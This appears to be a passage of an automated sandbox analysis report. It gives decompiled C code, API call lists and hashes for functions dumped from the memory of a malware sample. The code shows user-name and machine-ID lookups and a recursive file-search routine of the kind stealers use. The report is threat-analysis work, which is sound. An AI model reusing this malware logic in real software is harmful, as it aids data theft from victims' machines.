                                                                      0x00401397
                                                                      0x00401397
                                                                      0x004013aa
                                                                      0x004013b7
                                                                      0x004013bc
                                                                      0x004013be
                                                                      0x004013c2
                                                                      0x004013cb
                                                                      0x004013d2
                                                                      0x004013de
                                                                      0x004013e5
                                                                      0x00000000
                                                                      0x004013e5
                                                                      0x004013d2
                                                                      0x004013ea

                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Virtual$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 2087232378-0
                                                                      • Opcode ID: b456f347803da6c756148ddd8e5b5f7e491697c6042c59f75db1c44bcb33eaea
                                                                      • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                                                                      • Opcode Fuzzy Hash: b456f347803da6c756148ddd8e5b5f7e491697c6042c59f75db1c44bcb33eaea
                                                                      • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004076B0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 43%
                                                                      			E004076B0(char __eax, void* __ebx, void* __ecx) {
				char _v8;
				intOrPtr _t24;
				intOrPtr _t27;

				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t27);
				_push(0x4076fc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27;
				GetFileAttributesW(E00403D3C(_v8)); // executed
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E00407703);
				return E00403B80( &_v8);
			}






                                                                      0x004076b5
                                                                      0x004076bb
                                                                      0x004076c2
                                                                      0x004076c3
                                                                      0x004076c8
                                                                      0x004076cb
                                                                      0x004076de
                                                                      0x004076e8
                                                                      0x004076eb
                                                                      0x004076ee
                                                                      0x004076fb

                                                                      APIs
                                                                        • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                      • GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String$AllocAttributesFileFree
                                                                      • String ID:
                                                                      • API String ID: 2634384563-0
                                                                      • Opcode ID: 4a55e6a7ccd81ca30525239ac909850159b087d308325e78fb273df2937a63e3
                                                                      • Instruction ID: a7f0668d61e2dec431e32046e2844a6437fd6a4f389a52c14dd3b7fa7bab2667
                                                                      • Opcode Fuzzy Hash: 4a55e6a7ccd81ca30525239ac909850159b087d308325e78fb273df2937a63e3
                                                                      • Instruction Fuzzy Hash: A8F03074514608EFD701EB69CC5289EBBFCEB497647A1057AF410E35D1EB38BE00D568
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004065C4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004065C4(intOrPtr* __eax) {
				short _v516;
				signed int _t4;
				signed int _t5;
				int _t9;
				void* _t11;
				signed int _t14;
				void* _t18;
				DWORD* _t19;

				_t4 = __eax +  *__eax;
				 *_t4 =  *_t4 + _t4;
				_t5 = _t4 | 0x5300000a;
				_t19 = _t18 + 0xfffffdfc;
				_t14 = _t5;
				 *_t19 = 0xff;
				_t9 = GetUserNameW( &_v516, _t19); // executed
				if(_t9 == 0) {
					_t11 = E00403B80(_t14);
				} else {
					_t11 = E00403D10(_t14, 0x100,  &_v516);
				}
				return _t11;
			}











                                                                      0x004065c4
                                                                      0x004065c6
                                                                      0x004065c8
                                                                      0x004065cd
                                                                      0x004065d3
                                                                      0x004065d5
                                                                      0x004065e9
                                                                      0x004065ed
                                                                      0x00406603
                                                                      0x004065ef
                                                                      0x004065fa
                                                                      0x004065fa
                                                                      0x0040660f

                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                      • Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
                                                                      • Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                      • Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004065C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004065C8(signed int __eax) {
				short _v516;
				signed int _t4;
				int _t8;
				void* _t10;
				signed int _t13;
				void* _t17;
				DWORD* _t18;

				_t4 = __eax | 0x5300000a;
				_t18 = _t17 + 0xfffffdfc;
				_t13 = _t4;
				 *_t18 = 0xff;
				_t8 = GetUserNameW( &_v516, _t18); // executed
				if(_t8 == 0) {
					_t10 = E00403B80(_t13);
				} else {
					_t10 = E00403D10(_t13, 0x100,  &_v516);
				}
				return _t10;
			}










                                                                      0x004065c8
                                                                      0x004065cd
                                                                      0x004065d3
                                                                      0x004065d5
                                                                      0x004065e9
                                                                      0x004065ed
                                                                      0x00406603
                                                                      0x004065ef
                                                                      0x004065fa
                                                                      0x004065fa
                                                                      0x0040660f

                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                      • Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
                                                                      • Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                      • Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403604 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
				int _t4;
				int _t5;

				_t4 =  *0x41c5a8; // 0x3
				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
				return _t5;
			}





                                                                      0x00403614
                                                                      0x0040361a
                                                                      0x00403620

                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide
                                                                      • String ID:
                                                                      • API String ID: 626452242-0
                                                                      • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                      • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
                                                                      • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                      • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403B58 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 46%
                                                                      			E00403B58(signed int __eax) {
				signed int _t2;
				signed char _t12;
				void* _t14;
				void* _t18;

				_t2 = __eax;
				if(__eax == 0) {
					L11:
					return _t2;
				} else {
					_push(__eax);
					_push(0); // executed
					L00401148(); // executed
					if(__eax == 0) {
						__eax = __eax & 0x0000007f;
						__edx =  *__esp;
						_t18 = _t14;
						_t12 = _t2 & 0x0000007f;
						if( *0x41c008 != 0) {
							 *0x41c008();
						}
						if(_t12 != 0) {
							if(_t12 <= 0x18) {
								_t1 = _t12 + 0x41b03c; // 0xd7c9c8cc
								_t12 =  *_t1;
							}
						} else {
							_t12 =  *0x41c624; // 0x0
						}
						return E004025C0(_t18);
					} else {
						goto L11;
					}
				}
			}







                                                                      0x00403b58
                                                                      0x00403b5a
                                                                      0x00403b6c
                                                                      0x00403b6c
                                                                      0x00403b5c
                                                                      0x00403b5c
                                                                      0x00403b5d
                                                                      0x00403b5f
                                                                      0x00403b66
                                                                      0x00402614
                                                                      0x00402617
                                                                      0x004025ce
                                                                      0x004025d2
                                                                      0x004025dc
                                                                      0x004025e2
                                                                      0x004025e2
                                                                      0x004025ea
                                                                      0x004025f7
                                                                      0x004025fd
                                                                      0x004025fd
                                                                      0x004025fd
                                                                      0x004025ec
                                                                      0x004025ec
                                                                      0x004025ec
                                                                      0x00402610
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403b66

                                                                      APIs
                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403B5F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocString
                                                                      • String ID:
                                                                      • API String ID: 2525500382-0
                                                                      • Opcode ID: 910dd29793ec8a5ceaf1035511d9dc783a106504b7dd8afe82433608cd4bcd15
                                                                      • Instruction ID: bea8321bd29b1b0cb3959915f15724c359703e68ceae1f32cab0dcb1509c9ee6
                                                                      • Opcode Fuzzy Hash: 910dd29793ec8a5ceaf1035511d9dc783a106504b7dd8afe82433608cd4bcd15
                                                                      • Instruction Fuzzy Hash: 9FB0123460820111FA143D720E01B331C5C0B50B4BF880037AD21F51C3DD7DE901503E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403B70 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E00403B70(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _t4;

				_t4 =  *__eax;
				 *__eax = __edx;
				if(_t4 != 0) {
					_push(_t4); // executed
					L00401158(); // executed
					return __eax;
				}
				return __eax;
			}




                                                                      0x00403b70
                                                                      0x00403b70
                                                                      0x00403b74
                                                                      0x00403b76
                                                                      0x00403b77
                                                                      0x00000000
                                                                      0x00403b77
                                                                      0x00403b7c

                                                                      APIs
                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00403B77
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString
                                                                      • String ID:
                                                                      • API String ID: 3341692771-0
                                                                      • Opcode ID: d497d8846639aaf179110225e0e01da4904a3c484c5354391378440b3d8208c6
                                                                      • Instruction ID: 1013a877abc153affaca16d078552d4a9b2fa22a8452acd7ddfc898bd50da8eb
                                                                      • Opcode Fuzzy Hash: d497d8846639aaf179110225e0e01da4904a3c484c5354391378440b3d8208c6
                                                                      • Instruction Fuzzy Hash: A6A011A800020288CB0A3A2A00008232A3AAFC8308388C0BEA2002A2A28A3E88008028
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401464 Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00401464(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x41c5d4; // 0xe49764
				while(_t35 != 0x41c5d4) {
					_t42 =  *_t35;
					_t43 =  *(_t35 + 8);
					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
						if(_t43 < _v28) {
							_v28 = _t43;
						}
						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
						if(_t31 > _v24) {
							_v24 = _t31;
						}
						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
						if(_t32 == 0) {
							 *0x41c5b0 = 1;
						}
						E0040126C(_t35);
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 != 0) {
					 *_v32 = _v28;
					_t27 = _v24 - _v28;
					 *((intOrPtr*)(_v32 + 4)) = _t27;
					return _t27;
				}
				return _t24;
			}
















                                                                      0x00401468
                                                                      0x0040146b
                                                                      0x0040146f
                                                                      0x00401472
                                                                      0x0040147c
                                                                      0x00401480
                                                                      0x00401487
                                                                      0x0040148b
                                                                      0x004014e4
                                                                      0x00401493
                                                                      0x00401495
                                                                      0x0040149a
                                                                      0x004014ab
                                                                      0x004014ad
                                                                      0x004014ad
                                                                      0x004014b3
                                                                      0x004014ba
                                                                      0x004014bc
                                                                      0x004014bc
                                                                      0x004014c8
                                                                      0x004014cf
                                                                      0x004014d1
                                                                      0x004014d1
                                                                      0x004014dd
                                                                      0x004014dd
                                                                      0x004014e2
                                                                      0x004014e2
                                                                      0x004014ec
                                                                      0x004014f2
                                                                      0x004014f9
                                                                      0x00401503
                                                                      0x00401509
                                                                      0x00401511
                                                                      0x00000000
                                                                      0x00401511
                                                                      0x0040151b

                                                                      APIs
                                                                      • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 1263568516-0
                                                                      • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                      • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
                                                                      • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                      • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040151C Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x41c5d4; // 0xe49764
				while(_t29 != 0x41c5d4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                      0x00401523
                                                                      0x00401527
                                                                      0x0040152e
                                                                      0x00401543
                                                                      0x0040154b
                                                                      0x00401551
                                                                      0x00401557
                                                                      0x0040155a
                                                                      0x0040159e
                                                                      0x00401562
                                                                      0x00401568
                                                                      0x0040156c
                                                                      0x0040156e
                                                                      0x0040156e
                                                                      0x00401574
                                                                      0x00401576
                                                                      0x00401576
                                                                      0x0040157c
                                                                      0x00401589
                                                                      0x00401590
                                                                      0x00401592
                                                                      0x00401598
                                                                      0x00000000
                                                                      0x00401598
                                                                      0x00401590
                                                                      0x0040159c
                                                                      0x0040159c
                                                                      0x004015ad

                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401589
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                      • Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
                                                                      • Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                      • Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004015B0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E004015B0(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x41c5d4; // 0xe49764
				while(_t19 != 0x41c5d4) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x41c5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                      0x004015b4
                                                                      0x004015c5
                                                                      0x004015cc
                                                                      0x004015d5
                                                                      0x004015d9
                                                                      0x004015dc
                                                                      0x004015df
                                                                      0x0040161f
                                                                      0x004015e7
                                                                      0x004015ed
                                                                      0x004015f2
                                                                      0x004015f4
                                                                      0x004015f4
                                                                      0x004015f9
                                                                      0x004015fb
                                                                      0x004015fb
                                                                      0x004015ff
                                                                      0x0040160a
                                                                      0x00401611
                                                                      0x00401613
                                                                      0x00401613
                                                                      0x00401611
                                                                      0x0040161d
                                                                      0x0040161d
                                                                      0x0040162c

                                                                      APIs
                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,047A40A8,047A80AB,00401817), ref: 0040160A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 1263568516-0
                                                                      • Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                      • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                                                                      • Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                      • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00414408 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 496fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 83%
                                                                      			E00414408(char __eax, int __ebx, void* __ecx, char __edx, void* __edi, signed int __esi, char _a4, char _a8, char _a12, intOrPtr _a16, char _a20) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v53;
				intOrPtr _v56;
				struct _WIN32_FIND_DATAW _v648;
				char _v652;
				char _v656;
				char _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				intOrPtr _v700;
				char _v704;
				char _v708;
				char _v712;
				char _v716;
				char _v720;
				char _v724;
				char _v728;
				char _v732;
				char _v736;
				char _v740;
				char _v744;
				intOrPtr _v748;
				char _v752;
				char _v756;
				char _v760;
				char _v764;
				char _v768;
				char _v772;
				char _v776;
				char _v780;
				char _v784;
				char _v788;
				char _v792;
				void* _t239;
				void* _t295;
				intOrPtr* _t299;
				void* _t301;
				int _t312;
				int _t333;
				signed int _t343;
				long _t349;
				int _t354;
				int _t377;
				int _t383;
				void* _t387;
				intOrPtr* _t425;
				intOrPtr _t428;
				intOrPtr* _t456;
				int _t460;
				intOrPtr _t464;
				intOrPtr* _t471;
				intOrPtr _t486;
				intOrPtr _t496;
				intOrPtr _t497;
				intOrPtr _t499;
				void* _t534;
				void* _t556;
				void* _t570;
				void* _t573;
				signed int _t575;
				intOrPtr _t577;
				intOrPtr _t578;
				intOrPtr* _t579;

				_t574 = __esi;
				_t458 = __ebx;
				_t577 = _t578;
				_push(__ecx);
				_t464 = 0x62;
				do {
					_push(0);
					_push(0);
					_t464 = _t464 - 1;
					_t580 = _t464;
				} while (_t464 != 0);
				_t1 =  &_v8;
				 *_t1 = _t464;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				E004040F4( &_a20);
				_push(_t577);
				_push(0x414c0d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t578;
				_v20 = 0;
				E004062D8(_v8,  &_v652, _t580);
				E00403BE0( &_v8, _v652);
				E0040377C( &_v656, _a20);
				E0040795C(0x414c2c,  &_v52, _v656, _t580);
				E0040377C( &_v660, _v12);
				E0040795C(0x414c38,  &_v44, _v660, _t580);
				_t239 = E004045EC(_v44);
				_t581 = _t239;
				if(_t239 == 0) {
					L46:
					_pop(_t486);
					 *[fs:eax] = _t486;
					_push(E00414C17);
					E00403B98( &_v792, 2);
					E00403508( &_v784, 2);
					E00403B80( &_v776);
					E00403508( &_v772, 2);
					E00403B98( &_v764, 6);
					E004034E4( &_v740);
					E00403B98( &_v736, 5);
					E00403508( &_v716, 3);
					E00403B98( &_v704, 3);
					E004034E4( &_v692);
					E00403B80( &_v688);
					E004034E4( &_v684);
					E00403B98( &_v680, 5);
					E00403508( &_v660, 2);
					E00403B80( &_v652);
					_t496 =  *0x405f2c; // 0x405f30
					E004047B4( &_v52, _t496);
					E00403B80( &_v48);
					_t497 =  *0x405f2c; // 0x405f30
					E004047B4( &_v44, _t497);
					E00403B98( &_v40, 4);
					_t499 =  *0x4143e4; // 0x4143e8
					E004047B4( &_v24, _t499);
					E00403B98( &_v16, 3);
					_t214 =  &_a20; // 0x414c4c
					return E00403B80(_t214);
				} else {
					_push(E004045EC(_v24) + 1);
					E004047A8();
					_t579 = _t578 + 4;
					_push(_v24 + E004045EC(_v24) * 4 - 4);
					E0040781C(_v8, __ebx,  &_v664, _t581);
					_pop(_t295);
					E00403BBC(_t295, _v664);
					while(E004045EC(_v24) > 0) {
						_t299 =  *0x41b594; // 0x41c828
						_t34 = _t299 + 4; // 0x0
						_t301 =  *_t299 - 0x4b000;
						asm("sbb edx, 0x0");
						_t471 =  *0x41b63c; // 0x41c820
						_t35 = _t471 + 4; // 0x0
						__eflags =  *_t34 -  *_t35;
						if(__eflags != 0) {
							if(__eflags <= 0) {
								goto L46;
							}
							L8:
							E0040781C( *((intOrPtr*)(_v24 + E004045EC(_v24) * 4 - 4)), _t458,  &_v28, __eflags);
							E00403B80(_v24 + E004045EC(_v24) * 4 - 4);
							_t312 = E004045EC(_v24) - 1;
							__eflags = _t312;
							_push(_t312);
							E004047A8();
							_t579 = _t579 + 4;
							E00403DB8( &_v672, 0x414c40, _v28, __eflags);
							E0040781C(_v672, _t458,  &_v668, __eflags);
							_t573 = FindFirstFileW(E00403D3C(_v668),  &_v648);
							do {
								_push(_v28);
								_push(0x414c4c);
								_t474 = 0x104;
								E00403D10( &_v680, 0x104,  &(_v648.cFileName));
								_push(_v680);
								E00403E1C();
								E0040781C(_v676, _t458,  &_v32, __eflags);
								E0040770C(_v32, _t458, 0x104,  &_v36, _t574, __eflags);
								__eflags = (_v648.dwFileAttributes & 0x00000010) - 0x10;
								if((_v648.dwFileAttributes & 0x00000010) == 0x10) {
									L21:
									__eflags = _a8 - 1;
									if(_a8 != 1) {
										L30:
										__eflags = _a12 - 1;
										if(_a12 != 1) {
											goto L43;
										}
										E00403D10( &_v756, 0x104,  &(_v648.cFileName));
										E00403E64(_v756, 0x414c70);
										if(__eflags == 0) {
											goto L43;
										}
										E00403D10( &_v760, 0x104,  &(_v648.cFileName));
										E00403E64(_v760, 0x414c7c);
										if(__eflags == 0) {
											goto L43;
										}
										_t343 = _v648.dwFileAttributes;
										__eflags = (_t343 & 0x00000010) - 0x10;
										if((_t343 & 0x00000010) != 0x10) {
											goto L43;
										}
										__eflags = (_t343 & 0x00000400) - 0x400;
										if(__eflags == 0) {
											goto L43;
										}
										E0040781C(_v32, _t458,  &_v764, __eflags);
										_t349 = GetFileAttributesW(E00403D3C(_v764));
										__eflags = _t349 - 0xffffffff;
										if(_t349 == 0xffffffff) {
											goto L43;
										}
										_v53 = 0;
										_t458 = E004045EC(_v52) - 1;
										__eflags = _t458;
										if(_t458 < 0) {
											L41:
											__eflags = _v53;
											if(_v53 == 0) {
												_t354 = E004045EC(_v24) + 1;
												__eflags = _t354;
												_push(_t354);
												E004047A8();
												_t579 = _t579 + 4;
												E00403BBC(_v24 + E004045EC(_v24) * 4 - 4, _v32);
											}
											goto L43;
										}
										_t460 = _t458 + 1;
										_t575 = 0;
										__eflags = 0;
										do {
											E0040781C(_v32, _t460,  &_v776, __eflags);
											E0040377C( &_v772, _v776);
											E00406318(_v772, _t460,  &_v768, _t573, _t575);
											_push(_v768);
